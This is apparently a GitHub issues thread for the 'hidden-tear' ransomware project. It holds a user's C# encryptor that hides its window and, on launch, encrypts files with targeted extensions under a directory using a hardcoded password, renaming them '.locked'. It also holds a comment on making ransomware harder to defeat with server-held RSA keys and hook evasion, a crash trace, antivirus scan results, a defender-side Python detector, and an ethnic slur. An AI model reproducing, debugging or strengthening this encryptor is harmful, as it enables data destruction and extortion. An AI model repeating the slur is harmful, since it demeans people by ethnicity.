utkusen / hidden-tear
an open source ransomware honeypot
Turks smell awful.
Microsoft Visual C# 2010 does not compile. Tell me what to compile?
Nothing here
This project makes me cry.
Hello,
Where can we get a copy of the write.php file to test.
Thank you.
Hello,
After building it and naming it MyThing, using localhost for testing, I get the following error.
Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.
The remote server returned an error: (404) Not Found.
See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.
************** Exception Text **************
System.Net.WebException: The remote server returned an error: (404) Not Found.
at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
at System.Net.WebClient.DownloadString(Uri address)
at System.Net.WebClient.DownloadString(String address)
at hidden_tear.Form1.SendPassword(String password)
at hidden_tear.Form1.startAction()
at hidden_tear.Form1.Form1_Load(Object sender, EventArgs e)
at System.Windows.Forms.Form.OnLoad(EventArgs e)
at System.Windows.Forms.Form.OnCreateControl()
at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
at System.Windows.Forms.Control.CreateControl()
at System.Windows.Forms.Control.WmShowWindow(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.Form.WmShowWindow(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
************** Loaded Assemblies **************
mscorlib
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
MyThing
Assembly Version: 1.0.0.0
Win32 Version: 1.0.0.0
System.Windows.Forms
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Drawing
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Configuration
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Core
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Xml
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.
For example:
When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.
File Name: hidden-tear.exe
File Size: 12 KB
Scan Date: 2015-09-15
Scan Result: 7/35
MD5: 94ce7ab77e933c83410b38e455cd0b91
Verified By NoDistribute: Virus Scan Result
AVG Free: Could be a Trojan horse Cryptic
Avast: MSIL:Ransom-J [Trj]
AntiVir (Avira): Clean
BitDefender: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data: MSIL.Trojan-Ransom.Cryptear.A
IKARUS Security: Clean
Kaspersky Antivirus: HEUR:Trojan.Win32.Generic
McAfee: Ransomware-FAL!94CE7AB77E93
MS Security Essentials: Clean
ESET NOD32: Trojan.MSIL/Filecoder.Y
Norman: Clean
Norton Antivirus: Trojan.Cryptolocker.Y
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean
Could you share how to build the hidden-tear executable in a video tutorial like the demonstration one?
Very much appreciated.
A
@utkusen, despite the legal warning, I'm not comfortable using/extending this project without a license.
Do you have the intention of setting this project as open source?
Hey, I wanted to make a cool folder encryptor as a fun project, and then I came across hidden-tear.
I was trying to encrypt a directory with a built-in key. Check it out:
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;

namespace folderlocker
{
    public partial class Form1 : Form
    {
        // Bug: in a regular C# string "\t" is a tab character, so "C:\test" is really
        // "C:<tab>est". That directory does not exist (and a tab is an illegal path
        // character), so Directory.GetFiles throws and nothing gets encrypted.
        // A verbatim string keeps the backslash literal.
        string dir = @"C:\test";

        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            Opacity = 0;
            this.ShowInTaskbar = false;
            //starts encryption at form load
            shebang();
        }

        // Only runs if it is wired to the form's Shown event in the designer or constructor.
        private void Form_Shown(object sender, EventArgs e)
        {
            Visible = false;
            Opacity = 1; // Opacity is a double in the range 0..1, not a percentage
        }

        //AES encryption algorithm
        public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
        {
            byte[] encryptedBytes = null;
            // Fixed salt: every run derives the same key and IV from the same password.
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
            using (MemoryStream ms = new MemoryStream())
            {
                using (RijndaelManaged AES = new RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;
                    // Key and IV are both taken from the same PBKDF2 output stream.
                    var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);
                    AES.Mode = CipherMode.CBC; // unauthenticated mode; ciphertext is malleable
                    using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                        cs.Close();
                    }
                    encryptedBytes = ms.ToArray();
                }
            }
            return encryptedBytes;
        }

        //Encrypts single file
        public void ef(string file, string password)
        {
            byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
            byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
            // Hash the password with SHA256
            passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
            byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
            File.WriteAllBytes(file, bytesEncrypted);
            System.IO.File.Move(file, file + ".locked");
        }

        //encrypts target directory
        public void ed(string location, string password)
        {
            //extensions to be encrypted
            var validbroz = new[]
            {
                ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png",
                ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
            };
            string[] files = Directory.GetFiles(location);
            string[] childDirectories = Directory.GetDirectories(location);
            for (int i = 0; i < files.Length; i++)
            {
                string extension = Path.GetExtension(files[i]);
                if (validbroz.Contains(extension))
                {
                    ef(files[i], password);
                }
            }
            for (int i = 0; i < childDirectories.Length; i++)
            {
                ed(childDirectories[i], password);
            }
        }

        public void shebang()
        {
            string password = "loda123";
            // Guard so a missing target directory fails quietly instead of crashing the form.
            if (Directory.Exists(dir))
            {
                ed(dir, password);
            }
            password = null;
            System.Windows.Forms.Application.Exit();
        }
    }
}
However, it doesn't encrypt the test directory. What is going wrong here?
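As an added defender-side example (not part of the project or of this thread), here is a small Python detector for the encrypt-and-rename pattern the posted code produces: files with one of its targeted extensions renamed to name + ".locked" in a burst by a single process. The event log format and the sample events are constructed for illustration.

```python
import ntpath
from collections import defaultdict

# Extension list copied from the encryptor posted above, plus its rename suffix.
TARGET_EXTENSIONS = {
    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png",
    ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd",
}
LOCKED_SUFFIX = ".locked"

# Constructed sample of file-rename events (not real telemetry):
# "<epoch> <process> RENAME <old path> -> <new path>"
SAMPLE_EVENTS = """\
1700000001 MyThing.exe RENAME C:\\test\\a.txt -> C:\\test\\a.txt.locked
1700000001 MyThing.exe RENAME C:\\test\\b.docx -> C:\\test\\b.docx.locked
1700000002 MyThing.exe RENAME C:\\test\\sub\\c.jpg -> C:\\test\\sub\\c.jpg.locked
1700000002 explorer.exe RENAME C:\\test\\notes.txt -> C:\\test\\notes-old.txt
1700000003 MyThing.exe RENAME C:\\test\\d.png -> C:\\test\\d.png.locked
1700000004 MyThing.exe RENAME C:\\test\\e.exe -> C:\\test\\e.exe.locked
"""

def parse_event(line):
    ts, proc, _verb, rest = line.split(" ", 3)
    old, new = rest.split(" -> ", 1)
    return int(ts), proc, old, new

def is_lock_rename(old, new):
    # The posted code does File.Move(file, file + ".locked"), so the new name is the
    # old name plus the suffix, and the original extension is one it targets.
    if new != old + LOCKED_SUFFIX:
        return False
    return ntpath.splitext(old)[1].lower() in TARGET_EXTENSIONS

def find_encryptors(log_text, threshold=3, window_seconds=10):
    """Map process -> largest burst of lock-renames seen within window_seconds."""
    per_proc = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, proc, old, new = parse_event(line)
            if is_lock_rename(old, new):
                per_proc[proc].append(ts)
    flagged = {}
    for proc, times in per_proc.items():
        times.sort()
        j = 0  # sliding window end; only ever moves forward
        for i, start in enumerate(times):
            while j + 1 < len(times) and times[j + 1] - start <= window_seconds:
                j += 1
            burst = j - i + 1
            if burst >= threshold:
                flagged[proc] = max(burst, flagged.get(proc, 0))
    return flagged
```

A plain rename of notes.txt and the .exe (not in the target list) are ignored; only the burst from MyThing.exe is reported.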
Encrypting using the symmetric code schema is weak since the program is vulnerable to all kinds of injections and attacks. Since the entire encryption occurs on the client side, a virus scanner (of sorts) could easily hook in, even after the event.
Ransomware like CryptoLocker (one of the most successful cryptoviruses we know so far) takes an entirely different approach. They rely on asymmetric encryption, specifically RSA, in which the private key never reaches the client system. This is much more secure since it's only the public key that needs to be exchanged between the parties. Also, you should write directly against the system libraries where needed to prevent hooks from listening in on communication. Supply your own crypto functions or use an open library instead. This all usually leads to a language with a lower abstraction level, for example C/C++.
There is the argument of complexity for these measures, but 'keeping things simple' is something you cannot afford in these areas where basically everything revolves around security. As for the education: this could barely pass as an encryption tool, much less malicious software.
If I understood the readme, it simply encrypts the file using AES, which uses symmetric keys. Is it just that? Real ransomware uses asymmetric schemes so that even if the connection is MITM-ed (some corporate proxy which logs even HTTPS requests), or in the case of reverse engineering, it isn't possible to decrypt the files.
Of course, asymmetric cryptography doesn't work for large files out of the box, so you either need to encrypt just part of the file, sufficient to make it unusable (a ransomware-like scheme), or encrypt the AES key using a public key generated on the server (a PGP-like scheme), which requires more care to avoid the AES key being retrieved without the private key.
I don't understand C# well, so I want to know how it works, specifically: does it just encrypt with AES, or does it use one of the schemes above?
Just reading the code, it appears to me that in the case of multiple folders you'll most probably definitely lose all the passwords but one, due to the usage of the sendControl variable...
Nice demo though, for wanna-be black/white hats!
Just wanted to congratulate you on your file encryption program. I did not understand why you called your file encryption program ransomware, though.
Also, this is just a legit file encryption program; if this program, without modification, gets caught by any antivirus, this is definitely a false positive.